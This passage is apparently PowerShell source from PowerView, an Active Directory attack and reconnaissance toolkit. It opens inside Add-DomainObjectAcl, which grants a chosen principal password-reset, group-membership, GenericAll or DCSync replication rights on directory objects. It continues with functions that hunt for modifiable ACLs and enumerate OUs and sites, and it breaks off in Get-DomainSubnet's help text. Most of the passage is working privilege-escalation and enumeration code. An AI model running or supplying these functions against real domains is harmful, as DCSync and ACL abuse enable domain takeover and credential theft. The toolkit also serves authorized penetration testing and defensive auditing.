$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')]
[String]
$Rights = 'All',
[Guid]
$RightsGUID
)
BEGIN {
$TargetSearcherArguments = @{
'Properties' = 'distinguishedname'
'Raw' = $True
}
if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain }
if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter }
if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase }
if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential }
$PrincipalSearcherArguments = @{
'Identity' = $PrincipalIdentity
'Properties' = 'distinguishedname,objectsid'
}
if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }
if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }
$Principals = Get-DomainObject @PrincipalSearcherArguments
if (-not $Principals) {
throw "Unable to resolve principal: $PrincipalIdentity"
}
}
PROCESS {
$TargetSearcherArguments['Identity'] = $TargetIdentity
$Targets = Get-DomainObject @TargetSearcherArguments
ForEach ($TargetObject in $Targets) {
$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None'
$ControlType = [System.Security.AccessControl.AccessControlType] 'Allow'
$ACEs = @()
if ($RightsGUID) {
$GUIDs = @($RightsGUID)
}
else {
$GUIDs = Switch ($Rights) {
# ResetPassword doesn't need to know the user's current password
'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }
# allows for the modification of group membership
'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
# 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
# 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
# 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c
# when applied to a domain's ACL, allows for the use of DCSync
'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'}
}
}
ForEach ($PrincipalObject in $Principals) {
Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname)"
try {
$Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid)
if ($GUIDs) {
ForEach ($GUID in $GUIDs) {
$NewGUID = New-Object Guid $GUID
$ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight'
$ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType
}
}
else {
# deault to GenericAll rights
$ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll'
$ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType
}
# add all the new ACEs to the specified object directory entry
ForEach ($ACE in $ACEs) {
Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)"
$TargetEntry = $TargetObject.GetDirectoryEntry()
$TargetEntry.PsBase.Options.SecurityMasks = 'Dacl'
$TargetEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)
$TargetEntry.PsBase.CommitChanges()
}
}
catch {
Write-Warning "[Add-DomainObjectAcl] Error granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname) : $_"
}
}
}
}
}
function Find-InterestingDomainAcl {
<#
.SYNOPSIS
Finds object ACLs in the current (or specified) domain with modification
rights set to non-built in objects.
Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName
.DESCRIPTION
This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
and for each returned ACE entry it checks if principal security identifier
is *-1000 (meaning the account is not built in), and also checks if the rights for
the ACE mean the object can be modified by the principal. If these conditions are met,
then the security identifier SID is translated, the domain object is retrieved, and
additional IdentityReference* information is appended to the output object.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER ResolveGUIDs
Switch. Resolve GUIDs to their display names.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Find-InterestingDomainAcl
Finds interesting object ACLS in the current domain.
.EXAMPLE
Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
Finds interesting object ACLS in the ev.testlab.local domain and
resolves rights GUIDs to display names.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs
.OUTPUTS
PowerView.ACL
Custom PSObject with ACL entries.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.ACL')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DomainName', 'Name')]
[String]
$Domain,
[Switch]
$ResolveGUIDs,
[String]
[ValidateSet('All', 'ResetPassword', 'WriteMembers')]
$RightsFilter,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$ACLArguments = @{}
if ($PSBoundParameters['ResolveGUIDs']) { $ACLArguments['ResolveGUIDs'] = $ResolveGUIDs }
if ($PSBoundParameters['RightsFilter']) { $ACLArguments['RightsFilter'] = $RightsFilter }
if ($PSBoundParameters['LDAPFilter']) { $ACLArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $ACLArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }
$ObjectSearcherArguments = @{
'Properties' = 'samaccountname,objectclass'
'Raw' = $True
}
if ($PSBoundParameters['Server']) { $ObjectSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ObjectSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ObjectSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ObjectSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ObjectSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ObjectSearcherArguments['Credential'] = $Credential }
$ADNameArguments = @{}
if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
# ongoing list of built-up SIDs
$ResolvedSIDs = @{}
}
PROCESS {
if ($PSBoundParameters['Domain']) {
$ACLArguments['Domain'] = $Domain
$ADNameArguments['Domain'] = $Domain
}
Get-DomainObjectAcl @ACLArguments | ForEach-Object {
if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) {
# only process SIDs > 1000
if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\d{3,}$') {
if ($ResolvedSIDs[$_.SecurityIdentifier.Value]) {
$IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass = $ResolvedSIDs[$_.SecurityIdentifier.Value]
$InterestingACL = New-Object PSObject
$InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN
$InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier
$InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights
if ($_.ObjectAceType) {
$InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType
}
else {
$InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'
}
$InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags
$InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType
$InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags
$InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass
$InterestingACL
}
else {
$IdentityReferenceDN = Convert-ADName -Identity $_.SecurityIdentifier.Value -OutputType DN @ADNameArguments
# "IdentityReferenceDN: $IdentityReferenceDN"
if ($IdentityReferenceDN) {
$IdentityReferenceDomain = $IdentityReferenceDN.SubString($IdentityReferenceDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
# "IdentityReferenceDomain: $IdentityReferenceDomain"
$ObjectSearcherArguments['Domain'] = $IdentityReferenceDomain
$ObjectSearcherArguments['Identity'] = $IdentityReferenceDN
# "IdentityReferenceDN: $IdentityReferenceDN"
$Object = Get-DomainObject @ObjectSearcherArguments
if ($Object) {
$IdentityReferenceName = $Object.Properties.samaccountname[0]
if ($Object.Properties.objectclass -match 'computer') {
$IdentityReferenceClass = 'computer'
}
elseif ($Object.Properties.objectclass -match 'group') {
$IdentityReferenceClass = 'group'
}
elseif ($Object.Properties.objectclass -match 'user') {
$IdentityReferenceClass = 'user'
}
else {
$IdentityReferenceClass = $Null
}
# save so we don't look up more than once
$ResolvedSIDs[$_.SecurityIdentifier.Value] = $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass
$InterestingACL = New-Object PSObject
$InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN
$InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier
$InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights
if ($_.ObjectAceType) {
$InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType
}
else {
$InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'
}
$InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags
$InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType
$InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags
$InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN
$InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass
$InterestingACL
}
}
else {
Write-Warning "[Find-InterestingDomainAcl] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with Convert-ADName"
}
}
}
}
}
}
}
function Get-DomainOU {
<#
.SYNOPSIS
Search for all organization units (OUs) or specific OU objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties whencreated,usnchanged,...". By default, all OU objects for
the current domain are returned.
.PARAMETER Identity
An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). Wildcards accepted.
.PARAMETER GPLink
Only return OUs with the specified GUID in their gplink property.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainOU
Returns the current OUs in the domain.
.EXAMPLE
Get-DomainOU *admin* -Domain testlab.local
Returns all OUs with "admin" in their name in the testlab.local domain.
.EXAMPLE
Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
Returns all OUs with linked to the specified group policy object.
.EXAMPLE
"*admin*","*server*" | Get-DomainOU
Search for OUs with the specific names.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainOU -Credential $Cred
.OUTPUTS
PowerView.OU
Custom PSObject with translated OU property fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.OU')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
[Alias('GUID')]
$GPLink,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$OUSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
if ($OUSearcher) {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^OU=.*') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainOU] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$OUSearcher = Get-DomainSearcher @SearcherArguments
if (-not $OUSearcher) {
Write-Warning "[Get-DomainOU] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
else {
try {
$GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
$IdentityFilter += "(objectguid=$GuidByteString)"
}
catch {
$IdentityFilter += "(name=$IdentityInstance)"
}
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['GPLink']) {
Write-Verbose "[Get-DomainOU] Searching for OUs with $GPLink set in the gpLink property"
$Filter += "(gplink=*$GPLink*)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainOU] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
$OUSearcher.filter = "(&(objectCategory=organizationalUnit)$Filter)"
Write-Verbose "[Get-DomainOU] Get-DomainOU filter string: $($OUSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $OUSearcher.FindOne() }
else { $Results = $OUSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$OU = $_
}
else {
$OU = Convert-LDAPProperty -Properties $_.Properties
}
$OU.PSObject.TypeNames.Insert(0, 'PowerView.OU')
$OU
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainOU] Error disposing of the Results object: $_"
}
}
$OUSearcher.dispose()
}
}
}
function Get-DomainSite {
<#
.SYNOPSIS
Search for all sites or specific site objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties whencreated,usnchanged,...". By default, all site objects for
the current domain are returned.
.PARAMETER Identity
An site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or
GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.
.PARAMETER GPLink
Only return sites with the specified GUID in their gplink property.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainSite
Returns the current sites in the domain.
.EXAMPLE
Get-DomainSite *admin* -Domain testlab.local
Returns all sites with "admin" in their name in the testlab.local domain.
.EXAMPLE
Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
Returns all sites with linked to the specified group policy object.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainSite -Credential $Cred
.OUTPUTS
PowerView.Site
Custom PSObject with translated site property fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.Site')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
[Alias('GUID')]
$GPLink,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{
'SearchBasePrefix' = 'CN=Sites,CN=Configuration'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$SiteSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
if ($SiteSearcher) {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^CN=.*') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainSite] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$SiteSearcher = Get-DomainSearcher @SearcherArguments
if (-not $SiteSearcher) {
Write-Warning "[Get-DomainSite] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
else {
try {
$GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
$IdentityFilter += "(objectguid=$GuidByteString)"
}
catch {
$IdentityFilter += "(name=$IdentityInstance)"
}
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['GPLink']) {
Write-Verbose "[Get-DomainSite] Searching for sites with $GPLink set in the gpLink property"
$Filter += "(gplink=*$GPLink*)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainSite] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
$SiteSearcher.filter = "(&(objectCategory=site)$Filter)"
Write-Verbose "[Get-DomainSite] Get-DomainSite filter string: $($SiteSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $SiteSearcher.FindAll() }
else { $Results = $SiteSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$Site = $_
}
else {
$Site = Convert-LDAPProperty -Properties $_.Properties
}
$Site.PSObject.TypeNames.Insert(0, 'PowerView.Site')
$Site
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainSite] Error disposing of the Results object"
}
}
$SiteSearcher.dispose()
}
}
}
function Get-DomainSubnet {
<#
.SYNOPSIS
Search for all subnets or specific subnets objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties whencreated,usnchanged,...". By default, all subnet objects for
the current domain are returned.
.PARAMETER Identity
An subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),
or GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.
.PARAMETER SiteName
Only return subnets from the specified SiteName.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
